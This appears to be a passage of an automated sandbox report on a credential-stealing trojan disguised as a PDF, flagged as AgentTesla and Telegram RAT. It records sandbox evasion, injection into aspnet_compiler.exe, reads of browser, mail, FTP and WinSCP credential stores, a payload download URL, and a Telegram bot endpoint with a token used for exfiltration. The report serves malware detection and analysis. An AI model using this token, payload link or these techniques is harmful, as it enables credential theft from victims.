Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98646	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98527	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98416	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98310	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98156	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97982	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97859	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97749	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97640	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97421	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97307	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 97077	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96858	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96749	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96421	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 96093	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95934	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95826	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95703	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95590	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95406	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95263	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 95140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0Microsoft\|VMWare\|Virtual
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerESbieDll.dllFcuckoomon.dllGwin32_process.handle='{0}'HParentProcessIdIcmdJselect * from Win32_BIOS8Unexpected WMI query failureKversionLSerialNumberNVMware\|VIRTUAL\|A M I\|XenOselect * from Win32_ComputerSystemPmanufacturerQmodelRMicrosoft\|VMWare\|VirtualSjohnTannaUxxxxxxxx
Source: aspnet_compiler.exe, 00000004.00000002.3390161307.000001699FF90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2648878438.000001F478E04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 85AF0000

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtQuerySystemInformation: Direct from: 0x7FFD90A81285	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtMapViewOfSection: Direct from: 0x7FFD93E7A7F5	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtProtectVirtualMemory: Direct from: 0x7FFD34A892B9	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtWriteVirtualMemory: Direct from: 0x7FFD34A8AEB4	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtQueryValueKey: Direct from: 0x7FFD8FFF1DC5	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtOpenKeyEx: Direct from: 0x7FFD93E587B7	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtAdjustPrivilegesToken: Direct from: 0x7FFD90A81BEC	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtCreateThreadEx: Direct from: 0x7FFD34A8AD21	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtProtectVirtualMemory: Direct from: 0x7FFD34A8A14F	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	NtQueryAttributesFile: Direct from: 0x7FFD93E5BC4A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 16985AF0000

Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Queries volume information: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1816, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1816, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1816, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1816, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1816, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	211 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	11 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	151 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
1C24TBP_00000143.pdf.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
1C24TBP_00000143.pdf.exe	100%	Avira	TR/Dldr.Agent.fzbie
1C24TBP_00000143.pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://uxVsY4GIHZ1cYWMz.net	0%	Avira URL Cloud	safe
http://uxVsY4GIHZ1cYWMz.net2:	0%	Avira URL Cloud	safe
https://www.inspiranti.com/wp-includes/Nuymzsracm.mp4	0%	Avira URL Cloud	safe
https://www.inspiranti.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	104.26.13.205	true	false	high
api.telegram.org	149.154.167.220	true	false	high
www.inspiranti.com	172.67.135.55	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://www.inspiranti.com/wp-includes/Nuymzsracm.mp4	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.telegram.org	aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169878BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/	aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://uxVsY4GIHZ1cYWMz.net	aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://uxVsY4GIHZ1cYWMz.net2:	aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.inspiranti.com	1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
